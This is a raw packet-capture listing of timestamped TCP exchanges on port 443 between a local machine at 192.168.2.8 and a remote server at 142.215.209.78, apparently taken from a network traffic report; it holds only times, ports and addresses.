                                                                                                                                                                                                                                Nov 18, 2024 16:52:37.000638962 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:37.000646114 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:37.000664949 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:37.001945019 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:37.001988888 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:37.001996040 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:37.002006054 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:37.002031088 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:37.003379107 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:37.003442049 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:37.003448009 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:37.009108067 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:37.009167910 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:37.009176970 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:37.053204060 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:37.061047077 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:37.061067104 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:37.061136007 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:37.061151028 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:37.115705967 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:37.116508007 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:37.116530895 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:37.116566896 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:37.116586924 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:37.116641998 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:37.117511034 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:37.117530107 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:37.117562056 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:37.117573977 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:37.117597103 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:37.117625952 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:37.118346930 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:37.118365049 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:37.118429899 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:37.118447065 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:37.119250059 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:37.119324923 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:37.119326115 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:37.119343042 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:37.119395018 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:37.121112108 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:37.121186018 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:37.121192932 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:37.121257067 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:37.121826887 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:37.121897936 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:37.121906042 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:37.128015041 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:37.128081083 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:37.128092051 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:37.178210020 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:37.179918051 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:37.179939032 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:37.180017948 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:37.180027008 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:37.225074053 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:37.235282898 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:37.235295057 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:37.235351086 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:37.235372066 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:37.235433102 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:37.236320019 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:37.236329079 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:37.236396074 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:37.236403942 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:37.237438917 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:37.237447977 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:37.237504959 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:37.237513065 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:37.238267899 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:37.238307953 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:37.238327980 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:37.238334894 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:37.238353014 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:37.240175962 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:37.240246058 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:37.240253925 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:37.241099119 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:37.241161108 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:37.241168022 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:37.287590027 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.306629896 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.306667089 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.306749105 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.306797028 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.306809902 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.308165073 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.308187008 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.308228016 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.308248997 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.308259964 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.310739040 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.310790062 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.310798883 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.310812950 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.310851097 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.311587095 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.311594963 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.311671019 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.311678886 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.312526941 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.312602997 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.312609911 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.314161062 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.314275026 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.314282894 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.314323902 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.315013885 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.315074921 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.315080881 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.315838099 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.315922022 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.315929890 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.316690922 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.316771030 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.316777945 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.317663908 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.317743063 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.317749023 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.318547010 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.318609953 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.318617105 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.320683002 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.320741892 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.320754051 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.321516991 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.321697950 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.321706057 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.322434902 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.322496891 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.322504044 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.323345900 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.323412895 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.323421955 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.324223042 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.324269056 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.324282885 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.324289083 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.324326038 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.325131893 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.325190067 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.325196028 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.325237989 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.326045990 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.326117039 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.326127052 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.326859951 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.326946974 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.326953888 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.327692986 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.327779055 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.327785969 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.328630924 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.328685045 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.328685045 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.328700066 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.328752995 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.328763008 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.329570055 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.329631090 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.329638958 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.329689026 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.330426931 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.330491066 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.330498934 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.331482887 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.331548929 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.331557035 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.331590891 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.331676960 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.331681967 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.332314014 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.332385063 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.332396030 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.333432913 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.333517075 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.333524942 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.333539009 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.333595037 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.333602905 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.334275961 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.334342957 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.334352970 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.335155010 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.335227966 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.335236073 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.335258007 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.335316896 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.335321903 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.336038113 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.336102962 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.336111069 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.336945057 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.337006092 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.337018967 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.337055922 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.337110996 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.337119102 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.337913990 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.338001013 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.338015079 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.338875055 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.338932037 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.338939905 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.338994980 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.339060068 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.339066982 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.339674950 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.339704037 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.339757919 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.339771032 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.339776039 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.339803934 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.339859962 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.340624094 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.340683937 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.340692997 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.341540098 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.341592073 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.341593981 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.341607094 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.341650009 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.341658115 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.342451096 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.342504978 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.342508078 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.342516899 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.342561960 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.342570066 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.342611074 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.343400002 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.343451977 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.343453884 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.343462944 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.343504906 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.343512058 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.344347000 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.344398975 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.344404936 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.344419003 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.344470978 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.344477892 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.344618082 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.345271111 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.345330000 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.345336914 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.346149921 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.346204042 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.346204996 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.346215963 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.346254110 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.346261978 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.347049952 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.347095013 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.347100973 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.347106934 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.347137928 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.347145081 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.347181082 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.348005056 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.348051071 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.348074913 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.348081112 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.348109007 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.348124027 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.348893881 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.348937035 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.348956108 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.348961115 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.348995924 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.349008083 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.349797010 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.349844933 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.349853039 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.349863052 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.349906921 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.349916935 CET44349706142.215.209.78192.168.2.8
